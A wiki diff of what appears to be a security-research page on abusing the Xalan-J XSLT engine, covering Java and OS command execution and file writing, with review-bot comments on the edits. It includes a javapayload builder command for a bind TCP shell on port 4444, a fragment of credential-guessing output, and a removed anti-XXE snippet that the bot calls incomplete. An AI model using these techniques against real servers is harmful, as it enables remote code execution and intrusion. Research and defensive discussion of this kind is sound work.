Changes for page Engine_XalanJ
on 2012/01/31 18:32
on 2012/01/17 09:27
Summary
- Page properties (1 modified, 0 added, 0 removed)

Details
- Page properties
- Content
... ... @@ -45,8 +45,6 @@ 45 45 46 46 = Java code execution = 47 47 48 -== Basic Java calls == 49 - 50 50 The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution. 51 51 52 52 |=Namespace|=Extension function|=PoC|=Sample output ... ... @@ -53,17 +53,6 @@ 53 53 |http:~/~/xml.apache.org/xalan/java/java.util.Date|new()|[[xalanj-java-date.xsl>>attach:xalanj-java-date.xsl]]|Current date: 54 54 Wed Jan 11 22:45:07 CET 2012 55 55 56 -== Executing arbitrary classes == 57 - 58 --- It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-( -- 59 - 60 -{{warning}} 61 -TODO : javapayload => loading arbitrary byte code (aka classes) via reflection 62 -$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 - - JSh 63 -List supported payloads ! 64 -Check supported versions of Xalan ! 65 -{{/warning}} 66 - 67 67 = OS command execution = 68 68 69 69 Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class. ... ... @@ -90,6 +90,16 @@ 90 90 91 91 It is of course possible to include commands for multiples OS in one file and to execute only the relevant ones. 92 92 80 += Pure Java reverse-shell = 81 + 82 +It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-( 83 + 84 +{{warning}} 85 +TODO : javapayload => loading arbitrary byte code (aka classes) via reflection 86 +$> java javapayload.builder.Builder Template XalanJ.xsl bind-jsh-4444.xsl BindTCP 127.0.0.1 4444 - - JSh 87 +Check supported versions of Xalan ! 88 +{{/warning}} 89 + 93 93 = File creation = 94 94 95 95 The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten. ... ... 
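Review bot: in the first hunk (@@ -45,8 +45,6 @@) the "Sample output" cell of the PoC table wraps onto a second line ("Wed Jan 11 22:45:07 CET 2012"), which ends the table row in the wiki table syntax and leaves the date as loose text under the table; since the hunk already touches this block, put the date on the row line or use an explicit line break inside the cell. Dropping the "== Basic Java calls ==" subheading itself is fine once the "Executing arbitrary classes" subsection is gone, as the "= Java code execution =" section then only holds this one PoC.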
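Review bot: in the second hunk (@@ -53,17 +53,6 @@) the removed sentence is struck through ("-- It is afaik not possible to get a pure Java reverse-shell, as we can't create threads :-( --"), but the copy re-added later in this change is plain text. If the strike-through recorded that the claim was no longer believed (the javapayload TODO right under it is about loading arbitrary bytecode, which points the other way), the move silently reinstates the claim; either keep the strike-through on the moved line or reword it so the sentence and the TODO below it do not contradict each other.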
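Review bot: in the third hunk (@@ -90,6 +90,16 @@) the new heading "= Pure Java reverse-shell =" does not match its body: the first sentence says a reverse shell is not possible, and the builder command embeds a bind stager ("BindTCP 127.0.0.1 4444"), which is a bind shell, not a reverse shell; "Pure Java shell" (and a note that it is still a TODO) would be accurate. The move also drops one line of the old warning block: "List supported payloads !" is not carried over, while "Check supported versions of Xalan !" is; restore it unless that item was resolved.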
@@ -120,10 +120,3 @@ 120 120 Username : [root] / Password : [uberpasswd] : 121 121 Username : [root] / Password : [cnam] : OK !! 122 122 Username : [pma] / Password : [pma] : ## 123 - 124 -= Anti XEE = 125 - 126 -DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance(); 127 -builderFactory.setExpandEntityReferences(false); <<<<==[Here]==<<<< 128 -DocumentBuilder builder = builderFactory.newDocumentBuilder(); 129 -DOMSource xmlSource = new DOMSource(builder.parse(new ByteArrayInputStream(myXmlString.getBytes(~)~)~));
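Review bot: in the last hunk (@@ -120,10 +120,3 @@) the only defensive content on the page, the "= Anti XEE =" section, is deleted without replacement. The snippet it removes, "builderFactory.setExpandEntityReferences(false); <<<<==[Here]==<<<<", is an incomplete XXE countermeasure on its own: it stops entity references from being expanded in the DOM but does not stop the parser from processing the DOCTYPE or fetching an external DTD, so if the section is being removed because it is misleading, say so in the summary; otherwise keep a short defensive section that disables DOCTYPE processing (the "http://apache.org/xml/features/disallow-doctype-decl" feature) and fix the title, which presumably means XXE. If the section comes back, put the Java in a {{code}} macro rather than inline text so the closing parentheses no longer need the "~)~)~)" escapes.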